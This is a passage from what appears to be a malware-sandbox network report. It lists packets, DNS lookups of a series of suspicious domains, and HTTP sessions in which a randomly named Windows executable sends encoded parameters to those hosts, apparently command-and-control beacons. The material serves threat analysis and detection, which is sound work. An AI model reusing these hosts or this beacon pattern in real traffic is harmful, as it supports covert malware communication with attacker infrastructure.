                                                                Dec 9, 2024 08:45:54.518640995 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.518723965 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.518770933 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.527169943 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.527272940 CET4975880192.168.2.12103.249.106.91
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 9, 2024 08:45:54.527292967 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.535597086 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.535661936 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.535706997 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.544076920 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.544223070 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.551239014 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.552587032 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.552675962 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.558773994 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.560990095 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.561105013 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.566768885 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.569571972 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.569730043 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.574765921 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.577897072 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.578275919 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.579042912 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.586333990 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.586421013 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.586615086 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.633987904 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.634099960 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.634742022 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.638252974 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.638298988 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.638717890 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.729751110 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.729835987 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.730015993 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.732438087 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.734648943 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:45:54.734811068 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.739989996 CET  49758        80         192.168.2.12    103.249.106.91
Dec 9, 2024 08:45:54.859277010 CET  80           49758      103.249.106.91  192.168.2.12
Dec 9, 2024 08:46:00.327905893 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:00.447141886 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:00.447220087 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:00.463568926 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:00.583265066 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.778703928 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.778743982 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.778822899 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.779495955 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.779547930 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.779586077 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.780045033 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.780138969 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.780178070 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.780667067 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.780755043 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.780796051 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.781383991 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.781450987 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.781542063 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.898129940 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.898232937 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.898294926 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.903717995 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.903731108 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.903759956 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.910753012 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.910829067 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:01.910872936 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:01.976485014 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:02.004889965 CET  80           49760      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:02.004956961 CET  49760        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:02.996783018 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:03.116272926 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:03.116419077 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:03.132781029 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:03.252052069 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.485342979 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.485394001 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.485609055 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.486469030 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.486599922 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.486615896 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.486644030 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.486888885 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.486962080 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.487066984 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.487149000 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.487198114 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.487374067 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.487827063 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.487871885 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.604984999 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.605101109 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.609301090 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.609338999 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.609385967 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.616785049 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.617530107 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.648791075 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:04.731043100 CET  80           49761      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:04.732877016 CET  49761        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:05.668693066 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:05.787997007 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:05.788079023 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:05.807804108 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:05.927143097 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:05.927160025 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.138952971 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.138994932 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.139060974 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.139535904 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.139607906 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.139676094 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.140130043 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.140208006 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.140789986 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.140870094 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.140877962 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.140991926 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.141489029 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.141551018 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.141629934 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.258433104 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.258500099 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.259244919 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.262612104 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.262676001 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.262970924 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.271013975 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.271109104 CET  80           49762      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:07.271275997 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:07.320306063 CET  49762        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:08.340282917 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:08.459675074 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:08.459779978 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:08.468229055 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:08.587589979 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.815165997 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.815220118 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.815345049 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.815571070 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.815638065 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.815682888 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.816328049 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.816370964 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.816411018 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.816914082 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.817003965 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.817058086 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.817646980 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.817708015 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.817750931 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.934771061 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.934791088 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.934941053 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.938900948 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.939017057 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.939100027 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:09.948894978 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.948910952 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:09.949033976 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:10.061300993 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:10.117084980 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:19.816323042 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:19.816456079 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:19.817961931 CET  49763        80         192.168.2.12    121.43.155.35
Dec 9, 2024 08:46:19.937180042 CET  80           49763      121.43.155.35   192.168.2.12
Dec 9, 2024 08:46:25.495431900 CET  49764        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:25.614676952 CET  80           49764      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:25.617018938 CET  49764        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:25.634076118 CET  49764        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:25.753408909 CET  80           49764      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:26.853106022 CET  80           49764      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:26.853260040 CET  80           49764      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:26.853604078 CET  49764        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:27.152909040 CET  49764        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:28.168981075 CET  49765        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:28.288259029 CET  80           49765      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:28.288489103 CET  49765        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:28.303020954 CET  49765        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:28.422382116 CET  80           49765      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:29.526635885 CET  80           49765      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:29.526725054 CET  80           49765      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:29.526824951 CET  49765        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:29.805202961 CET  49765        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:30.824927092 CET  49766        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:30.944508076 CET  80           49766      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:30.944611073 CET  49766        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:30.962975025 CET  49766        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:31.082369089 CET  80           49766      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:31.082415104 CET  80           49766      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:32.175741911 CET  80           49766      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:32.175888062 CET  80           49766      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:32.175937891 CET  49766        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:32.461471081 CET  49766        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:33.480422974 CET  49767        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:33.599662066 CET  80           49767      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:33.599848032 CET  49767        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:33.610960007 CET  49767        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:33.731329918 CET  80           49767      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:34.828695059 CET  80           49767      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:34.828718901 CET  80           49767      199.192.23.123  192.168.2.12
Dec 9, 2024 08:46:34.831180096 CET  49767        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:34.834980011 CET  49767        80         192.168.2.12    199.192.23.123
Dec 9, 2024 08:46:34.955008984 CET  80           49767      199.192.23.123  192.168.2.12
UDP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 9, 2024 08:43:17.076107025 CET  58355        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:43:17.676295996 CET  53           58355      1.1.1.1         192.168.2.12
Dec 9, 2024 08:43:34.239970922 CET  57070        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:43:34.930557966 CET  53           57070      1.1.1.1         192.168.2.12
Dec 9, 2024 08:43:49.402509928 CET  53622        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:43:49.883111000 CET  53           53622      1.1.1.1         192.168.2.12
Dec 9, 2024 08:44:04.202589035 CET  56888        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:44:05.210939884 CET  56888        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:44:05.262517929 CET  53           56888      1.1.1.1         192.168.2.12
Dec 9, 2024 08:44:05.348798037 CET  53           56888      1.1.1.1         192.168.2.12
Dec 9, 2024 08:44:19.622571945 CET  57257        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:44:20.097646952 CET  53           57257      1.1.1.1         192.168.2.12
Dec 9, 2024 08:44:35.356292009 CET  50219        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:44:35.793514013 CET  53           50219      1.1.1.1         192.168.2.12
Dec 9, 2024 08:44:50.091387987 CET  53777        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:44:50.424304962 CET  53           53777      1.1.1.1         192.168.2.12
Dec 9, 2024 08:45:43.593003035 CET  57596        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:45:44.330847979 CET  53           57596      1.1.1.1         192.168.2.12
Dec 9, 2024 08:45:59.746803999 CET  59880        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:46:00.325237989 CET  53           59880      1.1.1.1         192.168.2.12
Dec 9, 2024 08:46:24.824915886 CET  52394        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:46:25.489885092 CET  53           52394      1.1.1.1         192.168.2.12
Dec 9, 2024 08:46:39.842200041 CET  65189        53         192.168.2.12    1.1.1.1
Dec 9, 2024 08:46:40.346640110 CET  53           65189      1.1.1.1         192.168.2.12
DNS Queries

Timestamp                           Source IP     Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 9, 2024 08:43:17.076107025 CET  192.168.2.12  1.1.1.1  0x6e8c    Standard query (0)  www.holytur.net            A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:43:34.239970922 CET  192.168.2.12  1.1.1.1  0x9c06    Standard query (0)  www.nieuws-july202488.sbs  A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:43:49.402509928 CET  192.168.2.12  1.1.1.1  0x7dcf    Standard query (0)  www.losmason.shop          A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:44:04.202589035 CET  192.168.2.12  1.1.1.1  0xc32b    Standard query (0)  www.hayaniya.org           A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:44:05.210939884 CET  192.168.2.12  1.1.1.1  0xc32b    Standard query (0)  www.hayaniya.org           A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:44:19.622571945 CET  192.168.2.12  1.1.1.1  0xdfb1    Standard query (0)  www.lovel.shop             A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:44:35.356292009 CET  192.168.2.12  1.1.1.1  0x7b39    Standard query (0)  www.duskgazes.work         A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:44:50.091387987 CET  192.168.2.12  1.1.1.1  0xa06c    Standard query (0)  www.zrinorem-srumimit.sbs  A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:45:43.593003035 CET  192.168.2.12  1.1.1.1  0x4b3     Standard query (0)  www.6822662.xyz            A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:45:59.746803999 CET  192.168.2.12  1.1.1.1  0x8c39    Standard query (0)  www.lingdianyun29.xyz      A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:46:24.824915886 CET  192.168.2.12  1.1.1.1  0x26ab    Standard query (0)  www.learnnow.info          A (IP address)  IN (0x0001)  false
Dec 9, 2024 08:46:39.842200041 CET  192.168.2.12  1.1.1.1  0x6485    Standard query (0)  www.carpentry.club         A (IP address)  IN (0x0001)  false
DNS Answers

Timestamp                           Source IP     Dest IP       Trans ID  Reply Code    Name                       CName                  Address          Type                    Class        DNS over HTTPS
Dec 9, 2024 08:43:17.676295996 CET  1.1.1.1       192.168.2.12  0x6e8c    No error (0)  www.holytur.net            holytur.net            -                CNAME (Canonical name)  IN (0x0001)  false
Dec 9, 2024 08:43:17.676295996 CET  1.1.1.1       192.168.2.12  0x6e8c    No error (0)  holytur.net                -                      185.106.208.3    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:43:34.930557966 CET  1.1.1.1       192.168.2.12  0x9c06    No error (0)  www.nieuws-july202488.sbs  nieuws-july202488.sbs  -                CNAME (Canonical name)  IN (0x0001)  false
Dec 9, 2024 08:43:34.930557966 CET  1.1.1.1       192.168.2.12  0x9c06    No error (0)  nieuws-july202488.sbs      -                      162.0.215.33     A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:43:49.883111000 CET  1.1.1.1       192.168.2.12  0x7dcf    No error (0)  www.losmason.shop          -                      104.18.73.116    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:05.262517929 CET  1.1.1.1       192.168.2.12  0xc32b    No error (0)  www.hayaniya.org           hayaniya.org           -                CNAME (Canonical name)  IN (0x0001)  false
Dec 9, 2024 08:44:05.262517929 CET  1.1.1.1       192.168.2.12  0xc32b    No error (0)  hayaniya.org               -                      192.185.147.100  A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:05.348798037 CET  1.1.1.1       192.168.2.12  0xc32b    No error (0)  www.hayaniya.org           hayaniya.org           -                CNAME (Canonical name)  IN (0x0001)  false
Dec 9, 2024 08:44:05.348798037 CET  1.1.1.1       192.168.2.12  0xc32b    No error (0)  hayaniya.org               -                      192.185.147.100  A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:20.097646952 CET  1.1.1.1       192.168.2.12  0xdfb1    No error (0)  www.lovel.shop             -                      13.248.169.48    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:20.097646952 CET  1.1.1.1       192.168.2.12  0xdfb1    No error (0)  www.lovel.shop             -                      76.223.54.146    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:35.793514013 CET  1.1.1.1       192.168.2.12  0x7b39    No error (0)  www.duskgazes.work         duskgazes.work         -                CNAME (Canonical name)  IN (0x0001)  false
Dec 9, 2024 08:44:35.793514013 CET  1.1.1.1       192.168.2.12  0x7b39    No error (0)  duskgazes.work             -                      3.33.130.190     A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:35.793514013 CET  1.1.1.1       192.168.2.12  0x7b39    No error (0)  duskgazes.work             -                      15.197.148.33    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:50.424304962 CET  1.1.1.1       192.168.2.12  0xa06c    No error (0)  www.zrinorem-srumimit.sbs  -                      104.21.38.113    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:44:50.424304962 CET  1.1.1.1       192.168.2.12  0xa06c    No error (0)  www.zrinorem-srumimit.sbs  -                      172.67.222.69    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:45:44.330847979 CET  1.1.1.1       192.168.2.12  0x4b3     No error (0)  www.6822662.xyz            -                      103.249.106.91   A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:46:00.325237989 CET  1.1.1.1       192.168.2.12  0x8c39    No error (0)  www.lingdianyun29.xyz      -                      121.43.155.35    A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:46:25.489885092 CET  1.1.1.1       192.168.2.12  0x26ab    No error (0)  www.learnnow.info          -                      199.192.23.123   A (IP address)          IN (0x0001)  false
Dec 9, 2024 08:46:40.346640110 CET  1.1.1.1       192.168.2.12  0x6485    No error (0)  www.carpentry.club         -                      52.60.87.163     A (IP address)          IN (0x0001)  false
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.12 | 49726 | 185.106.208.3 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:17.828968048 CET | 531 | OUT | GET /cs9k/?Ebfx6=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZBVouQbNz2bSzCzmmREJaSGclyy3fj8=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.holytur.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:19.166208029 CET | 304 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:43:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.12 | 49729 | 162.0.215.33 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:35.068867922 CET | 817 | OUT | POST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER5Vq4yqVSh7/dBwCmpb5fdBo9trUGpg==
                                                                Dec 9, 2024 08:43:36.387365103 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:36 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
